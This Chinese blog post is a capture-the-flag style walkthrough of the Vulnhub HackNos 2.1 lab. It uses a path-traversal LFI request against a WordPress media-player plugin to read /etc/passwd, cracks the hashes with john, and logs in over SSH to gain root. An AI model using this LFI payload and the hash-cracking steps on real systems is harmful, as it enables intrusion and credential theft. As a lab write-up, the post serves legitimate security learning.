hackme:2.1

最新推荐文章于 2024-10-14 16:14:40 发布
最新推荐文章于 2024-10-14 16:14:40 发布
阅读量78 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47078547/article/details/131190893
版权
本文详细介绍了如何通过Vulnhub下载的HackNos2.1靶机进行渗透测试,包括主机发现、端口扫描、WordPress插件漏洞利用、密码破解以及获取root权限的过程。最终通过插件GraceMediaMediaPlayer的LFI漏洞获取了/etc/passwd,使用john破解密码并成功登录SSH成为root用户。
摘要由CSDN通过智能技术生成

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/hacknos/Os-hackNos-2.1.ova

测试机系统:kali、win10

测试机IP:192.168.3.140

kali:192.168.3.136

一、信息收集

1.主机发现

arp-scan -l    #因为用的桥接,所以能扫描到别的主机

这里可以打开虚拟机设置,通过网卡来找到主机

发现靶机IP:192.168.3.220

2.端口扫描

步骤一:通过浏览器访问80端口发现为Apache安装默认页面使用dirsearch进行目录扫描...发现tsweb目录为WordPress站点...

git clone git://github.com/maurosoria/dirsearch    //dirsearch项目地址
 
dirsearch -u http://192.168.1.213/       或者
./dirsearch.py -u http://192.168.213/           // 进入dirsearch目录输入这条命令

得到一个http://192.168.5.133/tsweb/,在浏览器中访问它

步骤二:使用wpscan工具进行漏洞扫描...

wpscan --url http://192.168.3.220/tsweb -e ap

步骤三:通过以上的扫描结果到Exploit-DB中进行查找漏洞利用方法,可以查看该漏洞可以查看具有此漏洞机器上的passwd文件内容

发现有漏洞的插件GraceMedia Media Player

https://www.exploit-db.com/exploits/46537     //漏洞地址
The following URL have been confirmed that is vulnerable to local file
inclusion.

浏览器访问:http://192.168.3.220/tsweb/wp-content/plugins/gracemedia-media-player/


打开readme.txt

Local File Inclusion POC:

GET
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

将GET下面的字符串拼接在网页后面

得到flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
john /root/桌面/1.txt --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt

攻击目标主机-->通过WP的插件漏洞获取到目标的/etc/passwd文件内容且存在flag用户-->使用john进行密码加密值的破解成功并登录

flag/topsecret 
ssh flag@192.168.3.220
成功登录
Could not chdir to home directory /home/flag: No such file or directory
flag@hacknos:/$ 

cat /etc/passwd | grep bash
cat /var/backups/passbkp/md5-hash

flag@hacknos:/$ cat /etc/passwd |grep bash
root:x:0:0:root:/root:/bin/bash
rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
flag@hacknos:/$ cat /var/backups/passbkp/md5-hash
$1$rohit$01Dl0NQKtgfeL08fGrggi0
flag@hacknos:/$ 
得到$1$rohit$01Dl0NQKtgfeL08fGrggi0

步骤七:对rohit用户进行解密...并获取密码!%hack41 切换到rohit用户...

将$1$rohit$01Dl0NQKtgfeL08fGrggi0写入文档中

 john test2 --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt  
得到:
rohit/!%hack41
直接远程连接
ssh rohit@192.18.3.220

sudo su   #切换root权限
ls 
cat user.txt

Romantic Never Die
关注
hackme靶场练习
SYJ_361的博客
03-18 2505
本文对hackme靶场进行练习,运用sql注入漏洞,以及msf木马反弹shell,进而取得root权限
hackme web wp(全)
zhwho的博客
04-07 1325
HackmeCTF—WP WEB 1.hide and seek 根据题目意思猜测网页源代码里可能会有 提示,右键查看网页源代码,发现flag 2.guestbook 看到no data,点击new post可以插入新的数据,然后再回到message list可以看到刚才插入的数据,点进去阅读,看到可疑的URL:?mod=read&id=152如图2.12.1 尝试SQL注入 首先...
VulnHub-hackme:1漏洞利用流程
2301_76786857的博客
06-13 293
靶机地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.1291.下载并导入靶机打开vmware——文件—打开—hackme.ova—导入虚拟机2.查看网络适配器将靶机网络适配器改为NAT模式3.启动靶机点击 ▶靶机,开启成功。
Hackme1
追求卓越,技术流~
01-12 2179
文章目录前言一、搭建靶场环境二、实战2.1信息收集2.1.1网络扫描2.1.2查看靶机开放的端口22段口分析80端口分析2.2SQL注入2.2.1验证是否含有SQL注入漏洞2.2.2sqlmap注入攻击2.3文件上传漏洞2.4kali监听2.5权力提升总结 前言 学习网络安全技术,我认为:主要是在注重实战。 实践是检验真理的唯一标准 接下来主要围绕靶机的攻击进程来学习网络安全技术。 一、搭建靶场环境 攻击机kali: IP地址:192.168.247.129 靶机hackme1: IP地址:192.
靶机渗透练习14-hackme2
hirak0的博客
04-15 1032
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
靶机渗透练习13-hackme1
hirak0的博客
04-15 691
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic
2024三掌柜赠书活动第三十二期:渗透测试理论与实践
软贱开发攻城狮
10-09 7705
众所周知,在网络安全领域,渗透测试是一种评估计算机系统、网络或Web应用安全性的重要方法。通过模拟恶意攻击者的行为,渗透测试旨在发现和利用系统中的安全漏洞,让系统更加安全。那么本文就来深入探讨渗透测试的理论基础和实践应用,为网络安全专业的小伙伴提供全面的指导,值得一读。渗透测试是一种授权的、系统的、全面的评估活动,旨在通过模拟攻击者的技术和方法来识别和利用目标系统的安全漏洞。本书是一本面向网络安全初学者的入门和实战指南。
靶机渗透练习99-hacksudo:FOG
hirak0的博客
05-12 4769
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-fog,697/ Description This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b) The box was created with Virtualbox. Upon booting up use netdiscov
靶机渗透练习97-hacksudo:ProximaCentauri
hirak0的博客
05-10 2703
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-proximacentauri,709/ Description Box created by hacksudo team members vishal Waghmare , Soham Deshmukh This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server (http
HACKME: 1实战演练
龙狼刺的博客
05-24 185
HACKME: 1
BLE_HackMe:低功耗蓝牙低硬件HackMe
03-13
低功耗蓝牙低硬件HackMe 该项目旨在介绍BLE协议及其安全性基础。 具有蓝牙接口的标准Windows 10计算机将模拟各种BLE设备-在无线电层上的工作原理与真实设备完全相同。 在一系列复杂性越来越高的任务中,允许您熟悉...
Hackme:Hackme is a network security answer platform,Hackme网络安全答题平台
04-27
Hackme Hackme is a network security answer platform,Hackme网络安全答题平台 sec 为第一个版本,大家多多支持。 由于之前写的时候是用于网络安全知识普及性质的线下赛,所以有些内容不适合线上CTF,需要一些修改...
海浪模型的matlab代码-HackMe:HackMe项目的官方公共存储库
05-27
海浪模型的matlab代码HackMe项目的官方公共存储库。 想要贡献吗? 联系Harris Mohamed()或Amith Chivikula() HackIllinois 2019海洋资源软件(Particle提出),The Very Hungry Caterpillar(Caterpillar提出)...
【云原生安全篇】Notation助力Harbor镜像验证实践
最新发布
StevenZeng学堂
10-14 1900
❤️摘要: 随着容器化技术的普及,容器镜像的安全性愈发成为企业关注的焦点。Harbor 作为一款开源的企业级镜像仓库管理工具,通过提供多种安全功能来帮助企业管理容器镜像的生命周期。而 Notation 则是一个用于容器镜像签名的工具,能够为镜像提供加密签名,以确保镜像的来源可验证、内容未被篡改。本文将详细介绍如何在 Harbor 中使用 Notation 对镜像进行签名和验证,帮助读者提升镜像安全的管理能力。
【WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2133
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 338
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
探索光耦:光耦助力高速电吹风安全与性能的革命性提升
forvevr的博客
10-10 516
一旦电吹风内部温度过高或电路出现故障,光耦能够迅速传递故障信号至控制器,触发自动保护机制,切断电源,从而防止元器件损坏,延长电吹风的使用寿命。综上所述,选择搭载光耦技术的高速电吹风,不仅意味着为头发护理带来了更健康、智能的解决方案,更是对安全性和耐用性的有力保障。这一利用光信号实现电气隔离的电子元件,通过独特的非接触式传输方式,有效隔绝了电路的电气联系,从而显著提高了设备的安全性,避免了高压电路可能带来的风险。其中,光耦(光电耦合器)的引入,无疑为电吹风的性能优化与安全保障开辟了新路径。
网络安全的全面指南
qq_42568323的博客
10-09 1284
网络安全是指保护计算机网络及其数据免受未经授权访问、攻击或破坏的过程。其目标是确保信息的机密性、完整性和可用性。
IPguard与Ping32对比分析:选择适合的终端安全解决方案
weixin_44264342的博客
10-10 466
IPguard更适合需要全面监控和个性化管理的企业,而Ping32则是追求高效和简约的理想之选。强大的兼容性:Ping32能够与多种安全软件无缝对接,提升企业的整体安全防护能力。IPguard凭借其强大的终端安全管理功能,成为了众多企业的优选。全面报告:详细的安全报告和审计功能,帮助管理层实时掌握安全状况,做出快速决策。操作简便:Ping32的界面友好,易于使用,适合各类技术水平的用户。快速部署:快速的安装和配置流程,让企业能够迅速上线,节省时间和成本。相对而言,Ping32则更注重性能和用户体验。
AppUse:安卓渗透测试平台与定制ROM详解
AppUse还带有直观的dashboard界面,简化了测试流程,预装了‘hackme’应用和服务端,用于学习和实践渗透测试技术。该平台基于Ubuntu Linux,内置了常用的攻击工具和环境变量,如ADB,便于高效工作。" AppUse是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值